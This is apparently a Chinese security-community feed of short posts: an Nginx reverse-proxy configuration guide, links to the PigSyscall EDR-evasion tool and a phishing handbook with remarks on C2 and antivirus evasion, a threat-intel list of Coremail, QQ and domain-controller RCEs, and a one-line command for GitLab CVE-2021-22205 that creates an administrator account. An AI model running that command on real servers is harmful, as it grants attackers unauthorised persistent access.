Quan


WEB安全 内网安全 终端对抗 威胁情报 搜索内容
终端对抗
PigSyscall
特点如下:
Indirect Syscall
Using Exception Directory to get SSNs
Mask Syscall Stub in static file
Dynamic decrypt stub and make Call
回来再详细看一下,学习一下

https://github.com/evilashz/PigSyscall
WEB安全
Nginx常见配置情况
主要想分享一下这几天配置这台Nginx反代服务器常用的一些代码片段,方便以后快速部署
1.301跳转
主要是有些Web Application不支持反代,会转圈
server {
    listen 80;
    server_name blog.tysec.cn;
   
    return 301 https://www.cnblogs.com/tysec;
}
2.反向代理服务器配置
可以达到不暴露IP地址,但主要是为了绑域名,方便访问网站。
server {
    listen 80;
    server_name tysec.cn;

    location / {
        proxy_pass 想要反代的IP地址;
    }
}
3.设置某个目录需要账号密码
这个需要两步,首先是得先配置账号密码
htpasswd -c /etc/nginx/.htpasswd username
之后会让你输入密码
接着在你要的server块下配置
location /static/downloads/{
        proxy_pass http://127.0.0.1:10000; #反代地址
        auth_basic "Restricted Content";
        auth_basic_user_file /etc/nginx/.htpasswd; #生成的密码文件
    }
4.接入HTTPS证书
首先申请,腾讯云可以申请免费的SSL证书,五十张,足够了
接着到Nginx下配置:
server {
    listen 443 ssl;
    server_name domain.com;
ssl_certificate rdomain.com_bundle.crt;  #相对路径,该证书文件必须在nginx.conf同目录下
     ssl_certificate_key domain.com.key; 
     ssl_session_timeout 5m;
     ssl_protocols TLSv1.2 TLSv1.3; 
     ssl_ciphers ECDHE-RSA-AES128-GCM-SHA256:HIGH:!aNULL:!MD5:!RC4:!DHE; 
     ssl_prefer_server_ciphers on;
    location / {
        proxy_pass http://127.0.0.1:10000;
    }
5.HTTP跳转HTTPS
server{
listen 80;
server_name www.redteam.wang redteam.wang;
return 301 https://$host$request_uri;
}
6.Nginx的日常操作
service nginx start #启动Nginx
service nginx stop #停止Nginx
nginx -t #检测配置文件是否正确
nginx -s reload #重载nginx配置文件

https://www.redteam.wang
终端对抗
钓鱼手册
一本针对钓鱼佬写的指南,主要是钓鱼的一些手法。其中可以多学习一些APT的手法,也许会有不错的收获。
免杀那块就算了,Github的基本上杀的死死的。
C2那里老老实实用二开CS就足够了

https://github.com/tib36/PhishingBook
WEB安全
GitLab的CVE-2021-22205,命令执行直接添加gitlab 管理员
gitlab-rails runner 'user = User.new; user.email = "test@example.com"; user.name = "test"; user.username = "test"; user.password = "password"; user.access_level="admin"; user.confirmed_at = Time.zone.now; user.save!'
如果是docker使用bin/rails runner

http://www.redteam.wang
威胁情报
20230821威胁情报一览
今天可谓精彩!赛博昆仑发出N个重量级漏洞,在这个特殊的日子里,未免有点太让人害怕了。
下面的几个都可以点击链接查看详情!
1.coremail RCE
目前暂未评估漏洞利用的难度有多大,影响面有多广
Coremail未授权远程代码执行.pdf
2.QQ RCE
这个据说最新版本还能打,很牛逼
QQ RCE复现 这个应该也是赛博昆仑披露的
3.域控
需要开启一些东西才可以打,自行评估影响面。
Windows域控RCE漏洞.pdf


http://www.redteam.wang